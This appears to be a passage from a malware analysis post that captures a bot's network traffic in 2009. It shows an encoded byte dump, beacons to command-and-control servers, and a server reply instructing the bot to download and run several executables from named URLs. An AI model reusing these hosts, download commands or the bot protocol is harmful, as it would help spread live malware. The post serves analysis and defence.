143:102:231:44:132:54:206:9:239:169:125:19:209:121:166:247:99:146:20:197:147:118:190:225:88:187:72:162:115:54:53:2:157:28:47:33:83:253:42:66:167:167:86:121:33:252:112:133:143:133:75:34:252:9:4:84:197:77:247:56:131:44:59:32:73:106:66:156:104:108:222:15:20:52:136:53:49:249:186:192:126:5:227:122:15:232:207:213:53:198:13:185:242:73:218:59:179:28:216:28:136:182:43:156:235:179:210:28:172:141:220:43:146:192:166:162:168:117:119:222:59:133:151:46:206:113:106:130:142:66:159:23:249:202:180:228:126:134:1:43:19:222:86:166:158:253:73:71:114:193:37:174:70:188:220:21:46:70:152:188:137:55:211:130:2:136:103:128:14:104:171:34:71:2:201:229:255:18:44:114:211:81:32:26:14:253:47:60:67:200:249:205:255:205:79:1:85:182:130:100:31:45:135:102:48:80:76:48:99:121:162:55:203:194:81:217:191:129:22:3:73:16:208:73:222:32:75:51:215:205:152:247:251:31:94:44:112:170:92:211:36:254:10:239:193:91:201:129:221:224:132:38:241:85:112:207:118:188:3:77:137:155:69:133:187:163:178:43:78:14:254:114:13:8:98:206:100:43:79:65:12:212:104:253:42:217:204:160:149:207:238:31:107:51:165:38:214:87:81:36:101:79:151:115:88:249:65:189:37:145:255:49:102:104:46:144:65:250:49:214:202:31:246:53:83:155:91:42:242:172:79:88:252:230:203:85:223:13:19:5:159:18:54:5:123:100:150:189:95:199:147:42:231:138:95:58:37:187:101:24:104:180:112:101:155:60:186:123:74:206:128:233:225:182:239:92:27:133:25:123:77:173:165:52:55:5:111:93:192:213:117:40:137:230:141:37:35:72:160:109:22:33:87:247:216:70:84:243:204:110:111:25:27:20:78:83:25:190:176:218:147:38:2:28:13:144:66:48:217:227:158:239:4:245:231:221:60:60:208:9:170:64:35:198:84:113:25:110:47:202:73:194:240:76:223:254:220:34:46:181:5:205:165:10:195:141:231:0:201:184:9:116:248:44:58:77:158:83:188:206:30:5:145:15:81:113:13:46:147:60:228:153:9:137:163:205:23:138:205:225:67:214:85:59:3:143:136:161:227:69:112:2:74:1:17:156:114:30:202:5:91:174:159:100:56:66:50:79:205:255:49:16:213:134:75:217:22:212:123:250:26:235:252:100:236:14:1:95:44:203:100:135:122:4:236:179:70:30:3:19:30:52:36:243:187:112:205:209:69:72:204:95:51:201:196:32:215:197:127:3:145:228:139:11:232:120:191:46:151:194:66:181:246:103:169:177:215:119:131:28:191:80:123:242:25:63:18:240:4:145:244:149:118:
GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1241292389:unique_start;1241530597:unique_start;1241643870:unique_start;1242216620:unique_start;1242765100:unique_start HTTP/1.1

Host: 78.109.29.112
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close

X-Powered-By: PHP/5.1.6
Content-Length: 0

This next portion is the bot receiving it’s commands on what files to download next

POST /ld/gen.php HTTP/1.1
Host: nua20090515.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1.2600 Service Pack 2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-type: application/x-www-form-urlencoded
Connection: close
Content-Length: 107

f=0&a=953988293&v=08&c=0&s=ld&l=8174&ck=0&c_fb=0&c_ms=0&c_hi=0&c_be=0&c_fr=-1&c_yb=-1&c_tg=0&c_nl=0&c_fu=-1HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:37:44 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
X-Powered-By: PHP/5.2.9
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
9a
#PID=8174
START|http://www.i-site.ph/1/6244.exe
START|http://www.i-site.ph/1/nfr.exe
STARTONCE|http://www.i-site.ph/1/pp.10.exe
WAIT|120
#BLACKLABEL
EXIT
0

Another GET that appears to be a bot check in type request, note the lack of user agent.

GET /v50/?v=66&s=I&uid=953988293&p=8174&q= HTTP/1.0
Host: 85.13.236.154
User-Agent:
HTTP/1.1 200 OK
Date: Wed, 20 May 2009 20:39:28 GMT
Server: Apache/2.2.10 (Fedora)
X-Powered-By: PHP/5.1.6
Cache-Control: no-cache
Work-Server: 85.13.236.154
Content-Length: 0
Connection: close
Content-Type: text/html

That’s all the analysis I have time for at the moment, this is a very large attack encompasing many malicious payloads. Hopefully more analysis will follow.